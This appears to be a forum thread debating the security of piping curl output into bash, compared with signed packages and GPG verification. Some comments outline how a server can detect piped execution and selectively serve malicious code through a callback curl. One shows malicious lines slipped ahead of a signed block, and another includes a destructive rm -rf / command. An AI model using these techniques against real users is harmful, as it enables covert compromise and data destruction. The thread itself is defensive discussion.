bash -c "$(curl -sSLf $URL)"
The key is to download first and then run:

curl $URL
less $FILE
bash $FILE
This attack only works at all if you download something and execute it immediately without looking at it.
Surely there's some compromise middle ground? Let me download a "safe-curl-bash" (scb) that only runs a script if it's trusted in some manner - maybe if its checksum matches a crowdsourced database?
"Sorry, only 9 people have declared this script valid and your threshold is 100. Here's a cat of the script; we'll ask you whether it looks valid, invalid, or you don't know."
I also think it's a bit more realistic than the, "anyone who does this should be reading the script first to check that it's safe." Yes, and I check the passenger jet for flaws before I board, too!
Just spitballing.
There is an entire infrastructure of people and processes in place to make sure that you don't have to check your passenger jet for flaws to be reasonably sure it's safe. No such infrastructure exists to protect you from the consequences of curl-bashing software off some random Web site.
I certainly have to do some hoop-jumping to execute the equivalent of curl | bash in PowerShell.
I don't read the source code for almost any of the code on my machine today. In most cases where I see `curl | bash`, I'd probably already be screwed even if I reviewed it. Most install scripts end up doing "hit website, install thing" anyway - am I reviewing the second-stage install script also?
This site's argument is that the software publisher can selectively attack users during a live software install, in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact).
But it's never presented in that way, as a feature. It's presented as a terrible way to distribute software.
The more important reason why it is a _horrible_, _stupid_ mechanism for software installation is that it is not _repeatable_.
It is well understood that casual .deb/.rpm usage requires the same level of trust as downloading anything else off the internet... but they have the added advantage of being _consistent_, _repeatable_, and _mirrorable_. I can copy the entire repository of any version of Debian I want to my local file server, and use that to spin up however much infrastructure I want. And the only person I need to rely on after I have fetched the initial packages is myself.
curl|bash involves no checks, and no system integration whatsoever.
1) Distributing software via bash script is a bad idea
2) Sensible people review the bash scripts they downloaded before running them
3) But haha! Here is a clever trick that evades that review.
And I'm not persuaded by 3) being interesting, because I already rejected 1) and 2), and I consider 3) to just be proving my point: you (for almost all of you!) are not competent to perform a very brief but somehow thorough security review of a shell script that probably has further dependencies you aren't even looking at. The actual reasoning to apply when deciding to install software this or any other way is purely "Do I trust the entity I have this TLS connection open with to run code on my machine?"
It's not trust now that you need to worry about. It's trust later, when curl-bash is part of an automated pipeline that no one pays attention to.
How do we come back next week and ensure some other process hasn't changed the files?
Package your files with a signed system. Auditing the files is trivial after that.
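For example, verifying installed files against what the package database recorded is a one-liner on either major family (assuming rpm, or the debsums tool on Debian-likes):

rpm -Va             # RPM: verify checksums/perms/sizes of every installed file
debsums --changed   # Debian/Ubuntu: list files that differ from their package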
`curl https://somesite.com/foo.sh | bash`
with
`curl https://somesite.com/foo.deb`
and
`curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software`
I don't think there are very meaningful differences in the security properties -- I don't think it's more difficult to become compromised by one than by one of the others.
But I agree with your sentiment. If the exact same step was to `apt install ecs-cli` I would just do that and not feel any inconvenience about it.
https://joeyh.name/code/moreutils/ https://rentes.github.io/unix/utilities/2015/07/27/moreutils...
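(moreutils is relevant here for sponge and vipe: sponge soaks up all of its input before writing anything, and vipe drops the stream into your editor mid-pipe. Hedged examples, with foo.sh as a placeholder:)

curl -sSLf https://somesite.com/foo.sh | vipe | bash     # review/edit in $EDITOR before anything runs
curl -sSLf https://somesite.com/foo.sh | sponge | bash   # buffer fully, so bash sees the whole script at once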
If you know you are running the standard scripts that everyone runs, then it also makes a post-breach investigation more easy. You know the exact scripts you ran as opposed to knowing "well I curl | bashed from these sites so one of them might be bad".
An amusing gotcha I found with docker was: how do I convince the servers I communicate with from inside the container that I am me? Best bet was to map my user into the user on the container, but that was actually ridiculously fraught with trouble. (There is a chance this has since been fixed...)
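For anyone hitting the same thing, the usual starting point is a sketch like this (image name and paths are placeholders):

# Run the container as the host uid/gid and mount credentials read-only,
# so processes inside authenticate to remote servers as "me".
docker run --rm \
    -u "$(id -u):$(id -g)" \
    -v "$HOME/.ssh:/home/me/.ssh:ro" \
    some-image some-command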
Be very careful here. https://installation.s3.amazonaws.com/setup.sh looks like a legit URL, but it's just some guy with an S3 bucket named "installation".
Either you trust the entity you're downloading software from or you don't.
Qubes OS adopted the "manual authentication" method (having to confirm everything, such as clipboard copy/paste).
This is probably not quite scalable (not to mention annoying). Maybe there's some way to have a short-lived session token, so that during a work session of a few hours it works without any intervention.
Say you already trust the website you're downloading from: is there an increased security risk in doing curl | bash as compared to rpm --import https://example.com/RPM-GPG-EXAMPLE && yum install https://example.com/example.rpm ?
No matter what, you're putting 100% faith in the server and the TLS connection. There are a lot of reasons to prefer packages, but I don't think security is one of them.
Not a random website, and they do have an infrastructure.
$ echo 'ls -l /proc/$$/fd/0' | bash
lr-x------ 1 kaz kaz 64 Jul 28 21:03 /proc/23814/fd/0 -> pipe:[4307360]
Here, our script consists of the ls command; it shows that when we pipe it to bash, it finds fd 0 to be a pipe. We can make some code conditional on this to produce a "don't run this script from a pipe" diagnostic.
This is superior to the dodgy, delay-based server-side detection because it is reliable.
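A minimal sketch of such a guard at the top of a script (Linux-specific, since it reads /proc):

#!/bin/bash
# Refuse to run when bash is reading this script from a pipe (curl ... | bash).
# /proc/$$/fd/0 resolves to whatever fd 0 of this bash process points at.
if [ -p "/proc/$$/fd/0" ]; then
    echo "Don't run this script from a pipe; save it and inspect it first." >&2
    exit 1
fi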
Also, it still works when someone does this:
$ curl <url> > file
$ cat file | bash
Of course, no protection for $ bash file

What do you mean? They could `tee` curl output to a file (or elsewhere, for archives). They could also suspend passing the output to bash until they've verified the output (perhaps they would run a hash function and compare the result).
deb is still a more structured format that is less likely to result in accidental collateral damage.
rm -rf --no-preserve-root / > /dev/null 2>&1
Oh, yeah - good luck getting the average layperson or even many sysadmins to inspect this - because very few people actually know how to review scriptlets in an RPM (rpm -qp --scripts package.rpm; isn't this nice and obvious?). Nobody bothers for packages distributed via yum repositories either, because manually downloading packages to review them defeats the purpose, right?
Yeah, everything is vulnerable at the end of the day - but at least with packages one is less likely to get seriously messed with, just not impervious to it.
I think there's a difference between trusting an organization's code that is published to the general public, and trusting an organization to send you arbitrary code in a specific moment. Only software distribution methods can enforce this kind of distinction, and curl | bash by itself doesn't, particularly in light of the article's technique.
I tried to discuss this distinction in some of my reproducible builds talks. There's a difference between trusting Debian to publish safe OS packages, and trusting Debian to send you a safe package when you run a package manager if the package could easily be different every time. This is particularly so when someone may be able to compromise the software publisher's infrastructure, or when a government may be able to compel the software publisher to attack one user but not other users.
Instead of your (1) and (2) above, how about this?
1) Distributing software via a method that can single out particular users and groups to receive distinctive versions is a bad idea: it increases the chance that some users will actually be attacked via the software publication system.
2) We might think that curl | bash isn't particularly egregious this way, because there are various ways that publishers might get caught selectively providing malicious versions. This is especially so because the publishers can't tell whether a curl connection is going to run the installer or simply save it to disk. That makes the publishers (or other people who could cause this attack to happen) less likely to do it.
3) But haha! Here is a clever trick that restores the publishers' ability to distinguish between running and saving the installer, and in turn breaks the most plausible ways that publishers could get caught doing this.
Edit: Elsewhere in this thread you suggested that the likeliest alternative is something like
curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software
I think I'd agree that this has some of the same problems, although it might have some advantages because of the potential decoupling between the distribution of the signing key and the distribution of the signed package. As another commenter pointed out, you could try to use a different channel to get or verify the key, and some users actually do; also, you'll have a saved copy of the key afterward.
Can anyone point to a single case of a shell pipe ever being abused ever?
A=$(curl -L https://get.rvm.io); echo "$A" | shasum -a 256 | grep -q 05b6b5f164d4df5aa593f9f925806fc1f48c4517daeeb5da66ee49e8562069e1 && echo "$A" | bash
For that matter, where did you get the key ID?
I'm certain that someone has been exploited using shell pipes.
> a knowledgable user will most likely check the content first
The obvious workaround would be to download with curl, inspect, then run the very same inspected file through bash. This workflow is easy even without pipes. Package files can also be inspected before running, and are not inspected directly in the browser.
Trust, on the other hand, is more complicated. Without doing tedious manual inspection, you have to rely on the distributor. Public keys aid in this regard, but they also don't work with the `curl | bash` workflow.
.deb and .dmg can be easily extracted. The former is just an `ar` archive containing tarballs, which you can (and should) extract to read the install scripts. (.dmg specifics escape me, since I only dealt with them one time, years ago.)
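E.g., to get at the maintainer scripts before installing (package name is a placeholder; not every package ships all four scripts):

ar x some-package.deb               # yields debian-binary, control.tar.*, data.tar.*
tar xf control.tar.*                # tar auto-detects gz/xz/zst compression
less preinst postinst prerm postrm  # whichever exist: the scripts dpkg runs as root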
Binary code isn't inscrutable. Some good tools for this are, among many, many more, IDA, Hopper, and radare2. How long this takes depends on what your goals are, how comprehensive you are, and the program complexity. I don't think I've yet spent years on one project, fortunately, but the months-long efforts, for undoing some once-prominent copyright protection systems, were pretty brutal. Smaller programs have taken me just several hours to appropriately examine.
There's nothing stopping somebody from even more trivially just sending each IP a benign script once (per curl user agent) and a malicious script the second time. Putting it in a file and executing the file brings it entirely into your domain of control.
1. Send your response as transfer-encoding: chunked and tcp_nodelay
2. Send the first command as
curl www.example.com/$unique_id
Then the server waits before sending the next command - if it gets the ping from the script, we know that whatever is executing the script is running the commands as they're sent, and is therefore unlikely to be read by a human before the next command runs. If it doesn't ping within a second or so, proceed with the innocent payload.

For extra evil deniability, structure your malicious payload as a substring of a plausibly valid sequence of commands - then simply hang the socket partway through. Future investigation will make it look like a network issue.
# Check network connectivity so we can continue the install
if ! curl --fail www.example.com; then exit; fi
Of course, what actually is happening is that we've just informed the server to now serve our malicious code.

bash -c "`echo echo hi`"

Note that `echo echo hi` is fully read, and then (and only then) passed to bash. Ditto for

bash -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.

It is impossible in general to know what the downstream user is going to do with the bytes you send. Even bash happens not to cache its input. But technically it could - it would be entirely valid for bash to read in a buffered mode which waits for EOF before interpreting.
dmg: download an archive file which contains a signed payload which is copied to Apps. Admin rights are used for copying only.
The difference is blindingly obvious.
You shouldn't, but people do, and are being directed to do so increasingly as Linux becomes more popular. Software developers want to be software publishers so bad that they're just going to keep pushing, and therein lies the risk: If people get the impression that packages are somehow more secure than shell scripts, then these kinds of attacks will simply become more prevalent.
To you it's obvious that packages aren't inherently more secure; it's how you get them that makes their normal use more secure. That's apparently too subtle a point for even big companies like Microsoft.
https://pydio.com/en/docs/v8/ed-debianubuntu-systems
https://docs.docker.com/install/linux/docker-ce/ubuntu/#inst...
https://www.spotify.com/uk/download/linux/
https://www.elastic.co/guide/en/apm/server/current/setup-rep...
https://ring.cx/en/download/gnu-linux
http://docs.grafana.org/installation/debian/
https://support.plex.tv/articles/235974187-enable-repository...
https://stack-of-tasks.github.io/pinocchio/download.html
http://download.mantidproject.org/ubuntu.html
https://docs.microsoft.com/en-us/cli/azure/install-azure-cli... (!!!)
You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.
Another problem is that people are being trained to get software [directly] from software developers.
The "antipattern" is letting/expecting software developers also be software publishers.
I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.
Not foolproof, but it answers your objection.
Verify key signatures.
And I really wish GPG had a negative trust signature.
Really? Are they going to read every line of code and every line of code in every dependency that the install script installs?
The bash detection is clever, but I think it's a solution to a problem that doesn't exist. It's already very easy to hide malicious code in plain sight, so why go to all this trouble to detect if the user is piping to bash?
For example, see how easy it is to publish a fake npm package or a .deb package:
https://hackernoon.com/im-harvesting-credit-card-numbers-and...
I wrote a tool that could be used like that, but it's useless if it's not ubiquitous (https://github.com/mmikulicic/runck)
$ curl <url> | pipe-checksum <expected> | bash
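For reference, a from-scratch sketch of that filter (not runck's actual implementation):

#!/bin/bash
# pipe-checksum (sketch): buffer all of stdin, verify its SHA-256 against
# the expected digest, and only then forward the bytes downstream.
expected="$1"
tmp=$(mktemp) || exit 1
trap 'rm -f "$tmp"' EXIT
cat > "$tmp"                                    # soak up the whole stream first
actual=$(sha256sum < "$tmp" | awk '{print $1}')
if [ "$actual" != "$expected" ]; then
    echo "pipe-checksum: mismatch: got $actual" >&2
    exit 1
fi
cat "$tmp"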
https://gist.github.com/pcl/64bd2f56695fcf8e1fad51443aab1f1e

E.g. the key from https://docs.docker.com/install/linux/docker-ce/ubuntu/#set-... doesn't have signatures, and isn't on the keyservers.
Of course an unsigned key missing from the keyservers still has the advantage that on subsequent installs/updates, the previously downloaded key persists. And you can keep the initially downloaded key in your CI configs.
This is ... not everything that it could be, and is approaching 30 years old, technology built for a vastly different world.
But this is the basis of the GPG / PGP Web of Trust.
https://en.wikipedia.org/wiki/Web_of_trust
http://www.pgpi.org/doc/pgpintro/
http://www.rubin.ch/pgp/weboftrust.en.html
(I've addressed this point ... a distressing number of times on HN: https://hn.algolia.com/?query=dredmorbius%20web%20of%20trust...)
I.e., curl is a *nix tool.
With the binary packages you don’t have any way to tell if the consumer is going to inspect it or not, so even if you send the malicious code to only a subset of people, there is a risk of detection.
The technique in the post allows you to distribute the malicious code only to people who aren’t inspecting it with a much higher success rate.
Personally I’m dubious that anyone is inspecting any installers with enough expertise and scrutiny to protect the rest of us, so the differences between the install methods in this regard are negligible.
At any rate - code-signing doesn't really help if the author is the attacker.
Indeed. While this particular venue wouldn't have worked for:
https://wiki.gentoo.org/wiki/Project:Infrastructure/Incident...
(a compromise of github itself would be needed) - it's easy to imagine one of the many mirrors of Debian to suffer from compromise. But as they just push signed debs, the damage would be limited (not trivial, there could conceivably be bugs in apt/dpkg/gnupg etc).
curl -s 'https://pgp.mit.edu/pks/lookup?op=get&search=0x1657198823E52A61' | gpg --import && \
if z=$(curl -s 'https://install.zerotier.com/' | gpg); then echo "$z" | sudo bash; fi
It's interesting - it tries to import a given gpg key from keyserver, then grabs a gpg armored text file with a bash header - with the gpg header wrapped in a here-document:

#!/bin/bash
<<ENDOFSIGSTART=
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
ENDOFSIGSTART=
I'm unsure, but I think you could just stick your malicious code before the signature?

#!/bin/bash
sudo much_evil
<<ENDOFSIGSTART=
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
ENDOFSIGSTART=
So it really isn't any better, as far as I can tell. There's also a trade-off between scripts that can be typed (curl https://i.com.com) and ones that need copy-pasting, as copy-pasting also isn't safe - even if that's a somewhat different attack vector (compromising the web site, altering js depending on the visitor).

Anyway, the use case for my runck utility is scripts such as Dockerfiles or CI automation, where I want to download and run installers without repeating the bash verification boilerplate.
You're supposed to do additional verification of PGP keys, either through attending key signing parties (who does that in 2018?), checking the signatures of people you already trust, or comparing as much out-of-band information as you can.
It's not terribly hard to create a plausibly trusted keyring from scratch that depends on only 1 of 3 websites being legitimate. For example:
kernel.org: ABAF11C65A2970B130ABE3C479BE3E4300411886 Linus Torvalds <torvalds@kernel.org>
marc.info: 647F28654894E3BD457199BE38DBBDC86092693E Greg Kroah-Hartman <gregkh@kernel.org>
thunk.org: 3AB057B7E78D945C8C5591FBD36F769BC11804F0 Theodore Ts'o <tytso@mit.edu>
All keys are cross signed, as shown by gpg2 --list-signatures.

If this sounds like a pain in the ass, it's because it is, and GPG could be so much better.
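Concretely, a sketch of building that keyring and checking the cross-signatures (assumes a reachable keyserver; fingerprints as listed above):

# Fetch each key by full fingerprint, then inspect who signed whom.
gpg2 --recv-keys \
    ABAF11C65A2970B130ABE3C479BE3E4300411886 \
    647F28654894E3BD457199BE38DBBDC86092693E \
    3AB057B7E78D945C8C5591FBD36F769BC11804F0
gpg2 --list-signatures torvalds@kernel.org gregkh@kernel.org tytso@mit.edu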
Ironically, if you can't acquire the developer's public signing key, it might be best to install software directly from their website, if no trusted repositories are available. If you can acquire their signing key, it's probably best to not install software directly from their website, in order to avoid selective distribution attacks. Sort of unintuitive.
If there were a standard `curlbash <URL> <SHA256>` program that was installed everywhere, it would let you work around all of these issues.
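Hypothetical usage - the internals would be essentially the pipe-checksum sketch above, and the rvm hash from upthread is purely illustrative:

curlbash https://get.rvm.io 05b6b5f164d4df5aa593f9f925806fc1f48c4517daeeb5da66ee49e8562069e1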
You can claim that you were MITM'd and point to the non-infectious cases as evidence that you always send a good payload.
If you mean that other thing, no.
It is definitely a kludge though.
curl www.example.com/downloads/fooprogram/builds/D41D8CD98F00B204E9800998ECF8427E.tgz
If the time between the script being downloaded and that file being requested is large, serve the clean copy; otherwise serve the malicious binary.

Now suppose packages.redhat.com gets hacked. Unless the hacker also stole the private key used for signing packages when they replaced the RPMs, I will get a warning/error while installing them (which, I admit, most users will ignore) - but curl|bash kinda defeats the point of package signing too.
When RPM-GPG-EXAMPLE and example.rpm are both coming from https://example.com it's less clear. When example.rpm is coming from a mirror repository, or being emailed around (yes, this happens), package signing asserts that example.rpm was signed by the key in RPM-GPG-EXAMPLE, which has a strong (but not bullet-proof) connection to being built by example.com.
From that example, we can see that package signing also protects from someone who's able to break into the main example.com webserver but not example.com's build system - if the attackers did not get into the build system and example.rpm has a valid signature, then despite the webserver being broken, the rpm file can still be trusted, assuming the webserver did not have a copy of the private key used for build signing. If we loaded https://example.com/RPM-GPG-EXAMPLE before the webserver was broken into, and then the webserver was broken into and a malicious RPM-GPG-EXAMPLE and example.rpm were uploaded, it would be noticed. (Examining changes to RPM-GPG-EXAMPLE is, unfortunately, left to the reader as an exercise.)
Still, while it's true that loading the file from https://example.com/RPM-GPG-EXAMPLE relies on TLS, there are methods available to confirm that the file's contents are valid that don't rely on TLS, if the security folk at example.com are doing their job.
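E.g., printing the downloaded key's fingerprint without importing it, to compare against a fingerprint published out-of-band (printed docs, a keyserver, a conference slide):

gpg --show-keys --with-fingerprint RPM-GPG-EXAMPLE   # GnuPG 2.1.23+
# older GnuPG: gpg --with-fingerprint RPM-GPG-EXAMPLE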
Finally, TLS is not an all-or-nothing game. Or rather, the certificate used to sign the https connection does not have to be blindly trusted; in the case of sketchy root certificates, even if https://example.com loads fine in a web browser, it does not mean it should necessarily be trusted. Certificate Transparency (e.g. crt.sh) is a proper lever when working with example.com.
Security is complicated and there are no silver bullets.
`curl | sudo bash` is batshit though.
What you're describing there is a package manager. What we don't need is a tool for running any random script from the wider internet.
I was assuming that the sites that you might `curl | bash` from are third-party sites (i.e. not your Linux distribution) that you don't have an existing trust relationship with, which makes it impossible to avoid this capability. That's the situation people use curl | bash in.
So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.
> you'll have a saved copy of the key afterward
Yes, though since dpkg post-install scripts can modify arbitrary files (right?), you can't trust that any files on your disk are the ones that existed before the compromise. So couldn't the malicious key verify the malicious package, which then overwrites the copy of the package and key on-disk with the good versions that were given to everyone else?
They both install, and both hit the bug and find that it has completely and utterly broken their network configurations bad enough that they have no network access at all.
Alice installed via the .deb. She can look at the scripts in the .deb and see what it was messing with, which gives her a big head start on figuring out how to fix it at least enough to connect to the network backup server and fully restore her network configuration.
Bob installed via "curl | bash". Bob is now left using find to look for recently changed configuration files, and paging through the out of date O'Reilly books he has from the old days when programmers owned physical books, trying to remember enough about network configuration to recognize what is wrong.
Trustworthy sites do not serve you malicious code. They often will, however, serve you buggy code.
It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.
[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.
The package management community needs to stop balkanizing.
How else do you propose releasing software to all Unix-like OSes without learning a half-dozen package-manager formats and quirks? The only other choice is a container.
1. Walled Garden: Developers don't self-publish. Call it an app store, call it everything-in-apt.
2. Encapsulate everything so that developers can't do anything. Don't use anything unless it comes in a docker instance. Or a FreeBSD jail. Or something else. Qubes maybe.
3. Smarter users. Good luck with that one.
Remember, I said that the bug in the file broke the network configuration so that Alice and Bob lost all network access.
The code starts to send chunked data and polls for a return curl call from the downloaded script. If the script's curl call calls home, the download will chunk out "bad" bash.
What I see happening is the downloaded script does not fully run until fully downloaded.
I guess we need some other infrastructure or social practice on top in order to compare what different people see, and/or allow the distributor to commit to particular versions. (Then having the distributor not know whether someone is blindly installing a particular file without verification is necessary, but not sufficient, to deter this kind of attack.)
> Execution in bash is performed line by line and so the speed that bash can ingest data is limited by the speed of execution of the script.
So even without any clever detection logic, thinking of curl | bash as "downloading a script, then immediately executing it" is already wrong.
It's more "give this remote host a poor man's shell to my machine and hope that they will always execute the same sequence of commands on it".
The simple solution here is to not download-and-execute with a pipe. Just use wget to save the file and check it locally (rather than through a browser) before executing.